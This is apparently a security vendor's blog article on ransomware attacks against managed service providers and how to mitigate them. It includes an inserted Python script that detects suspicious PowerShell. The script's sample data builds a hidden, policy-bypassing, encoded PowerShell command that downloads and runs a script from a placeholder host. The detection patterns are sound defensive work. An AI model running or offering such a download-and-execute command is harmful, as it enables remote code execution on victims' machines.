MSPs, often tasked with providing customers with IT security services, have found themselves in the crosshairs as ransomware groups increasingly focus their attacks on the MSP market, where a single incident can enable threat actors to deploy ransomware to dozens of businesses.
For MSPs, this poses a significant security challenge – but it also presents an opportunity. Prioritizing internal security protocols allows service providers to better protect themselves and, by extension, their customers. It also enables security-conscious MSPs to differentiate from competitors who may be more vulnerable to compromise.
In this article, we’ll explore why ransomware groups are targeting MSPs and discuss best practices for mitigating ransomware attacks.
Why do attackers target MSPs?
MSPs are a logical target for ransomware groups. In 2018, the Department of Homeland Security issued an alert stating that threat actors had been targeting MSPs since May 2016.
Since that warning was issued, dozens of MSPs have fallen to ransomware, leading to tens of thousands of endpoints being encrypted and ransomware groups generating millions of dollars.
Sadly, the trend doesn’t seem to be stopping any time soon. But why exactly are MSPs such popular targets?
Easy access to targets
MSP infrastructure enables attackers to gain direct access to clients. By using the legitimate credentials of a compromised MSP, attackers can move freely between an MSP and its customers’ shared networks, where ransomware can be deployed with little effort.
As the Department of Homeland Security noted: “MSPs generally have direct and unfettered access to their customers’ networks, and may store customer data on their own internal infrastructure. By servicing a large number of customers, MSPs can achieve significant economies of scale. However, a compromise in one part of an MSP’s network can spread globally, affecting other customers and introducing risk.”
Most ransomware attacks are financially motivated. While companies are typically discouraged from paying the ransom, MSPs are often more inclined to pay because failure to do so will result in significant downtime for their entire client base and may cause irreparable damage to the MSP’s reputation.
Given that the average North American MSP has 52 active customers, according to a report by SolarWinds and The 2112 Group, the collective financial impact of a ransomware attack on an MSP can be enormous.
Lack of resources
MSPs are often much smaller than the companies they serve – in fact, 65 percent of MSPs have fewer than 10 full-time employees, according to the above report.
Smaller MSPs are typically operating with limited resources, may lack dedicated security personnel and are often so busy that they simply don’t have the time to maintain strict cybersecurity practices.
Consequently, MSPs can be easier targets than larger corporations, while still giving attackers access to potentially hundreds or thousands of endpoints.
Biggest ransomware threats for MSPs
First discovered in August 2018, Ryuk was infamous for targeting large enterprises and making ransom demands that were, at the time, more than 10 times the average. Ryuk is typically dropped onto systems that have been compromised by Emotet and/or Trickbot, two trojans that are usually distributed via phishing emails. A number of MSPs have been affected by Ryuk, including Data Resolution, CorVel and CloudJumper.
Sodinokibi, sometimes referred to as REvil, was first spotted in April 2019. Threat actors typically use Sodinokibi to target MSPs by exploiting RDP vulnerabilities, stealing privileged credentials and leveraging commonly used remote monitoring and management (RMM) software to deploy ransomware to an MSP’s customers’ endpoints. Many MSPs have been affected by Sodinokibi, including Complete Technology Solutions, PerCSoft and Synoptek.
Best practices for mitigating ransomware
Adhering to proven cybersecurity fundamentals can go a long way toward securing both internal and client endpoints. The following recommendations should not be considered comprehensive but rather a collection of best practices for mitigating ransomware.
1. Secure remote access tools
One of the most effective things an MSP can do to mitigate ransomware is to ensure remote access tools are as secure as possible. This might involve:
- Enforcing MFA: Multifactor authentication (MFA) is a simple and very effective way to prevent attackers using compromised credentials to log in to remote access tools. Enable and enforce MFA wherever possible, with no exceptions.
- Implementing IP restrictions: Consider using IP restrictions to only allow users connected to the MSP’s local network to access remote administration tools.
- Updating RMM software: Vendors regularly release software updates to fix known vulnerabilities in their software. While patching may be inconvenient at times, it should always be considered a priority.
- Securing RDP: Remote Desktop Protocol (RDP) is Windows’ native remote administration tool, which has been repeatedly exploited in ransomware attacks. This guide from UC Berkeley is a good starting point for MSPs that wish to learn more about securing RDP, while this blog post offers some advice for preventing RDP brute force attacks.
2. Restrict network access
Ransomware attacks on MSPs frequently involve the use of stolen credentials. MSPs should operate on the assumption that their accounts will be compromised at some point and take steps to restrict network access accordingly.
- Adopt the principle of least privilege: Employees should only have access to the minimum resources necessary to do their jobs. Limit access rights and regularly audit permissions to ensure privileges are in line with current requirements. Staff should not have local administrator rights unless they are specifically needed for them to do their work.
- Practice good authentication hygiene: Staff should understand the fundamentals of creating strong passwords and avoid sharing or recycling login credentials. Consider using a password manager and enable MFA where possible.
- Prevent lateral movement: When an attacker gains access to one asset within a network, they’ll typically try to obtain a stronger foothold by spreading laterally across the network. Application whitelisting, MFA, network segmentation and good password management may be useful tools for preventing lateral movement. See this guide from the U.K.’s National Cyber Security Centre for more information.
3. Disable PowerShell if it’s not used
PowerShell is Microsoft’s built-in framework for task automation and configuration management. While it has many legitimate uses, PowerShell is often used by threat actors to deploy ransomware as it can execute macros, provide full access to many Windows system functions and execute payloads from memory.
MSPs should disable PowerShell if it is not critical to operations. MSPs that must use PowerShell should closely monitor all PowerShell activity so that suspicious behavior can be identified and stopped as quickly as possible.
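One way to triage PowerShell activity for the monitoring recommended above, as an added example rather than code from the original article: it flags encoded, hidden-window, policy-bypass and download-and-execute command lines taken from process-creation logs. The indicator list and the sample command lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# powershell.exe accepts abbreviated forms of -EncodedCommand (-e, -enc, ...) and the alias -ec.
ENC_FLAGS = {"encodedcommand"[:n] for n in range(1, 15)} | {"ec"}

# Heuristic indicators (assumptions for this example; tune them per environment).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:in\w*)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:x\w*|p)\s+bypass", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I),
}

def decode_encoded_command(cmdline):
    """Return the decoded script if an encoded-command flag is present, '' if it
    is present but cannot be decoded, or None if no such flag is used."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if flag[:1] in "-/" and flag[1:].lower() in ENC_FLAGS:
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return ""
    return None

def triage(cmdline):
    """Return the sorted list of indicator names that fire for one command line."""
    findings = set()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.add("encoded_command" if decoded else "undecodable_encoded_command")
    text = cmdline + "\n" + (decoded or "")  # scan the decoded script as well
    findings.update(name for name, rx in INDICATORS.items() if rx.search(text))
    return sorted(findings)

# Constructed sample command lines (not real telemetry); example.invalid is a placeholder.
_script = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLES = [
    "powershell.exe -NoProfile -File C:\\Scripts\\Get-PatchStatus.ps1",
    "powershell.exe -w hidden -ep bypass -enc "
    + base64.b64encode(_script.encode("utf-16-le")).decode(),
    "powershell.exe -EncodedCommand not*base64",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line), "<-", line[:60])
```

Command lines that return an empty list still deserve baselining: an MSP that uses PowerShell for routine automation should know which scripts and hosts are expected, so that anything else stands out.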
4. Secure endpoints
While ransomware can be distributed in many different ways, most attacks still originate the old-fashioned way – with a user getting duped by a malicious email. MSPs can protect their employees with the use of:
- Email security: Email authentication methods such as DMARC, SPF and DKIM are very useful for verifying sender domains, identifying forgery and preventing business email compromise attacks.
- Web filtering: Security tools such as Emsisoft Browser Security prevent users from accessing malicious websites and prevent phishing attacks.
- Endpoint security: Reliable antivirus software is crucial for preventing ransomware and other malware that may be used to deploy ransomware. For internal and client malware protection, MSPs may wish to consider Emsisoft Business Security, which features the Management Console, a web-based platform that allows for efficient remote endpoint security management. Emsisoft Business Security is the only endpoint security solution that checks for the use of recycled leaked passwords, which are frequently used in MSP hacks and ransomware attacks.
5. Select software carefully
MSPs rely on a wide range of tools to serve the diverse needs of their customers. Given that each of these tools is a possible point of entry for attackers, it’s important that MSPs evaluate the security practices of vendors before committing to a software solution.
6. Create offsite backups
An effective backup system is a critical part of any ransomware mitigation strategy. For MSPs, it’s important to remember that if an attacker has compromised their RMM software, they probably also have access to the MSP’s backups.
If an attacker has the opportunity to delete backups and gain additional leverage, they will do so. In addition, some ransomware strains are designed to encrypt backups stored both locally and in the cloud.
The simplest and most effective way of creating ransomware-proof backups is to adopt the 3-2-1 rule, which stipulates that an MSP should:
- Keep at least three copies of its files.
- Store the copies on at least two different types of storage media.
- Store at least one copy offsite. This copy should be isolated from the network, accessible to almost no one and preferably stored offline.
See this comprehensive guide for more information on how companies can protect backups from ransomware.
7. Implement BYOD policies
Cloud-based tools are ubiquitous in the MSP environment, but any device that is used to access corporate resources should be considered a potential security risk.
MSPs should not only ensure that all company-issued devices used for work purposes are properly secured but also implement policies for employees who use personal devices to work remotely.
Restricting network access, enforcing the use of a VPN, implementing device encryption and making MFA compulsory can help MSPs secure BYOD devices and reduce the risk of compromise.
8. Develop and test an incident response plan
Unfortunately, an MSP can do everything right and still experience a ransomware incident. When an incident occurs, it’s essential that MSPs have a plan in place that allows them to respond quickly and effectively.
- Communication: Establish responsibilities so that both staff and company leaders know what to do in the event of a ransomware incident. Define who needs to be contacted and in what order. This may include internal staff, customers, law enforcement, attorneys, PR and more.
- Isolate: Establish a strategy for isolating or disabling affected devices. Removing affected machines from the network limits the spread of ransomware.
- IR specialists: There are a number of incident response (IR) companies that aim to help ransomware victims restore operations, which often involves negotiating with threat actors to recover encrypted data. MSPs should evaluate IR options and have a contact number on hand should their services ever be required. Here at Emsisoft, we create custom decryption solutions for certain strains of ransomware for affected companies.
- Analysis: Define policies to preserve evidence that may help with the investigation. Policies should include guidance on how to collect as much information as possible about the incident, including log files, system images, samples of the encrypted files and the ransom note (if applicable) which may be useful for analysis. Staff should be prohibited from deleting any encrypted files until instructed to do so.
- Remediation: Define how the malware will be removed (if possible) and how systems will be restored via backups. MSPs will also need to consider investing resources into fixing the vulnerability that was exploited to reduce the risk of a future incident.
See the Department of Homeland Security’s report for more information on developing a ransomware IR plan, and check out our blog post for considerations when deciding whether or not to pay a ransom.
For MSPs, security is inextricably intertwined with that of their customers. If an MSP is compromised, it is highly likely that its customers will follow, leading to hugely disruptive downtime and massive ransom demands.
Businesses put a lot of trust in MSPs – it’s important that MSPs honor this trust by doing everything they can to reduce the risk of a ransomware incident. MSPs that take a proactive approach to security can gain a competitive edge as cybersecurity becomes an increasingly important business consideration across industries.